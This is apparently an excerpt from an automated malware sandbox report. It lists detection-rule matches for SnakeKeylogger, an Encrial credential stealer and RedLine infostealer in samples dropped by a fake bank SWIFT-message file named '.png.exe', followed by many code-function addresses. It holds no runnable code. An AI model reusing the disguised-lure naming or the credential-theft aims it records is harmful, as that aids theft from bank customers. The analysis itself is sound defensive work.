Source: 9.3.Native_New-Nova.exe.5993e8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 17.2.Native_snake01.exe.22202f6.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.Native_snake01.exe.49d0000.5.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 16.2.Native_New-Nova.exe.3450190.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.Native_snake01.exe.21402f6.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.Native_snake01.exe.21402f6.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.Native_snake01.exe.21402f6.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 9.2.Native_New-Nova.exe.23e0f08.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.Native_New-Nova.exe.23e0f08.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.Native_snake01.exe.4930000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 17.3.Native_snake01.exe.680768.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 10.2.Native_snake01.exe.4930000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 9.2.Native_New-Nova.exe.3600190.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 17.2.Native_snake01.exe.22202f6.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 9.2.Native_New-Nova.exe.3600190.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 16.2.Native_New-Nova.exe.50b0000.8.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 16.2.Native_New-Nova.exe.3426478.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.Native_snake01.exe.4930f20.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 10.2.Native_snake01.exe.49d0000.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 16.2.Native_New-Nova.exe.3450190.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.Native_snake01.exe.2141216.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.Native_snake01.exe.2141216.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 16.3.Native_New-Nova.exe.59f268.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.Native_snake01.exe.4930000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.Native_snake01.exe.4930000.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.Native_snake01.exe.4930000.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 10.2.Native_snake01.exe.2141216.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 16.2.Native_New-Nova.exe.2142746.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 16.2.Native_New-Nova.exe.2142746.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.Native_snake01.exe.2141216.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 16.2.Native_New-Nova.exe.50b0000.8.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.Native_snake01.exe.2141216.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 17.2.Native_snake01.exe.49c0f20.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.Native_New-Nova.exe.23e0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.Native_snake01.exe.2141216.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 9.2.Native_New-Nova.exe.23e0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 17.2.Native_snake01.exe.49c0f20.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.Native_snake01.exe.21402f6.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 17.3.Native_snake01.exe.680768.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 17.2.Native_snake01.exe.22202f6.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 17.3.Native_snake01.exe.680768.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.Native_snake01.exe.21402f6.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 17.3.Native_snake01.exe.680768.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 10.2.Native_snake01.exe.21402f6.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 17.2.Native_snake01.exe.22202f6.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 16.2.Native_New-Nova.exe.3426478.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 17.2.Native_snake01.exe.22202f6.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 17.2.Native_snake01.exe.49c0f20.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000010.00000002.2951469963.0000000002101000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000009.00000002.2953521524.0000000002261000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000009.00000002.2963089780.00000000035D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000011.00000002.2954940699.00000000021E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000009.00000002.2954150757.00000000023E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000009.00000002.2954150757.00000000023E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000011.00000002.2969063278.00000000049C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000011.00000002.2969063278.00000000049C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000011.00000002.2969063278.00000000049C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000011.00000003.1776206771.0000000000680000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000010.00000002.2964034510.0000000004A80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000010.00000002.2964034510.0000000004A80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0000000A.00000002.2969436130.0000000004930000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000A.00000002.2969436130.0000000004930000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0000000A.00000002.2969436130.0000000004930000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000010.00000003.1775462812.000000000059F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000A.00000003.1732371805.0000000000768000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000A.00000002.2970078800.00000000049D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000A.00000002.2970078800.00000000049D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0000000A.00000002.2970078800.00000000049D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000009.00000003.1730790993.0000000000599000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000A.00000002.2953656770.0000000002100000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000010.00000002.2962477768.0000000003421000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000010.00000002.2965310039.00000000050B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000010.00000002.2965310039.00000000050B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000011.00000002.2969184624.0000000004A10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000011.00000002.2969184624.0000000004A10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000011.00000002.2969184624.0000000004A10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000009.00000002.2964658526.0000000004B10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000009.00000002.2964658526.0000000004B10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: Process Memory Space: Native_New-Nova.exe PID: 7380, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: Native_snake01.exe PID: 7396, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: Native_New-Nova.exe PID: 7800, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: Native_snake01.exe PID: 7820, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe, type: DROPPED	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe, type: DROPPED	Matched rule: Detects RedLine infostealer Author: ditekSHen

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Code function: 0_2_0114E41C	0_2_0114E41C
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Code function: 0_2_0777E908	0_2_0777E908
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Code function: 0_2_07778680	0_2_07778680
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Code function: 0_2_07778F58	0_2_07778F58
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Code function: 0_2_07777FE8	0_2_07777FE8
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Code function: 0_2_07776FA8	0_2_07776FA8
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Code function: 0_2_07776B70	0_2_07776B70
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_00408C60	9_2_00408C60
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_0040DC11	9_2_0040DC11
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_00407C3F	9_2_00407C3F
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_00418CCC	9_2_00418CCC
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_00406CA0	9_2_00406CA0
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_004028B0	9_2_004028B0
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_0041A4BE	9_2_0041A4BE
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_00408C60	9_2_00408C60
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_00418244	9_2_00418244
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_00401650	9_2_00401650
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_00402F20	9_2_00402F20
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_004193C4	9_2_004193C4
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_00418788	9_2_00418788
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_00402F89	9_2_00402F89
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_00402B90	9_2_00402B90
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_004073A0	9_2_004073A0
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_02001198	9_2_02001198
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_020011A8	9_2_020011A8
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_02001437	9_2_02001437
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_02001448	9_2_02001448
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_04B589D0	9_2_04B589D0
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_04B5B6B0	9_2_04B5B6B0
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_04B522E8	9_2_04B522E8
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_04B589C0	9_2_04B589C0
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_04B5B6A1	9_2_04B5B6A1
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_04B5F218	9_2_04B5F218
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_05DF54A8	9_2_05DF54A8
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_05DF7E50	9_2_05DF7E50
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_05DF4E48	9_2_05DF4E48
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_05DF0619	9_2_05DF0619
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_05DF0040	9_2_05DF0040
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_05DFA2E8	9_2_05DFA2E8
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_05DFF5D0	9_2_05DFF5D0
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_05DFF5C0	9_2_05DFF5C0
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_05DFD5E0	9_2_05DFD5E0
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_05DF4598	9_2_05DF4598
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_05DF7590	9_2_05DF7590
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_05DF4588	9_2_05DF4588
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_05DF75A0	9_2_05DF75A0
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_05DFED10	9_2_05DFED10
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_05DFED20	9_2_05DFED20
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_05DF3CD7	9_2_05DF3CD7
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_05DF6CF0	9_2_05DF6CF0
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_05DF3CE8	9_2_05DF3CE8
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_05DF6CE1	9_2_05DF6CE1
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_05DF549C	9_2_05DF549C
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_05DF6440	9_2_05DF6440
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_05DFE470	9_2_05DFE470
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_05DFE460	9_2_05DFE460
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_05DF6430	9_2_05DF6430
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_05DFD768	9_2_05DFD768
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_05DF4E39	9_2_05DF4E39
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_05DF79F8	9_2_05DF79F8
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_05DF49F0	9_2_05DF49F0
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_05DF79E8	9_2_05DF79E8
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_05DF49E1	9_2_05DF49E1
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_05DF7148	9_2_05DF7148
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_05DF4140	9_2_05DF4140
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_05DFF178	9_2_05DFF178
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_05DFF169	9_2_05DFF169
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_05DF7139	9_2_05DF7139
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_05DF4131	9_2_05DF4131
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_05DFE8C8	9_2_05DFE8C8
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_05DF6898	9_2_05DF6898
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_05DF3890	9_2_05DF3890
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_05DF6889	9_2_05DF6889
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_05DF3880	9_2_05DF3880
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_05DFE8B8	9_2_05DFE8B8
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_05DFE018	9_2_05DFE018
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_05DFE008	9_2_05DFE008
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_05DF0007	9_2_05DF0007
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_05DFDBC0	9_2_05DFDBC0
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_05DFDBB0	9_2_05DFDBB0
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_05DFFA18	9_2_05DFFA18
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_05DFFA28	9_2_05DFFA28
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_05E784D8	9_2_05E784D8
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_05E76688	9_2_05E76688
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_05E76020	9_2_05E76020
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_05E77358	9_2_05E77358
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_05E76CF0	9_2_05E76CF0
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_05E74FD0	9_2_05E74FD0
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_05E73588	9_2_05E73588
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_05E73598	9_2_05E73598
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_05E744D1	9_2_05E744D1
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_05E70489	9_2_05E70489
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_05E70498	9_2_05E70498
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_05E72428	9_2_05E72428
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_05E72438	9_2_05E72438
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_05E71720	9_2_05E71720
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_05E71730	9_2_05E71730
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_05E7667C	9_2_05E7667C
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_05E711A0	9_2_05E711A0
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_05E71190	9_2_05E71190
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_05E73140	9_2_05E73140
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_05E73131	9_2_05E73131
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_05E70040	9_2_05E70040
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_05E70006	9_2_05E70006
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_05E76010	9_2_05E76010
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_05E77349	9_2_05E77349
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_05E70D48	9_2_05E70D48
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_05E70D38	9_2_05E70D38
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_05E76CE0	9_2_05E76CE0
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_05E72CE8	9_2_05E72CE8
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_05E72CD8	9_2_05E72CD8
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_05E71FE0	9_2_05E71FE0
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_05E74FC0	9_2_05E74FC0
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_05E71FD1	9_2_05E71FD1
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_05E73E48	9_2_05E73E48
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_05E73E39	9_2_05E73E39
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_05E739E0	9_2_05E739E0
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_05E779E9	9_2_05E779E9
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_05E739F0	9_2_05E739F0
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_05E779F8	9_2_05E779F8
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_05E708E0	9_2_05E708E0
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_05E708F0	9_2_05E708F0
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_05E72881	9_2_05E72881
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_05E72890	9_2_05E72890
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_05E71B88	9_2_05E71B88
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_05E71B79	9_2_05E71B79
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_06189971	9_2_06189971
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_06182A79	9_2_06182A79
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_06182830	9_2_06182830
Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Code function: 9_2_061818B0	9_2_061818B0
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_00408C60	10_2_00408C60
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_0040DC11	10_2_0040DC11
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_00407C3F	10_2_00407C3F
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_00418CCC	10_2_00418CCC
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_00406CA0	10_2_00406CA0
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_004028B0	10_2_004028B0
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_0041A4BE	10_2_0041A4BE
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_00408C60	10_2_00408C60
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_00418244	10_2_00418244
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Code function: 10_2_00401650	10_2_00401650
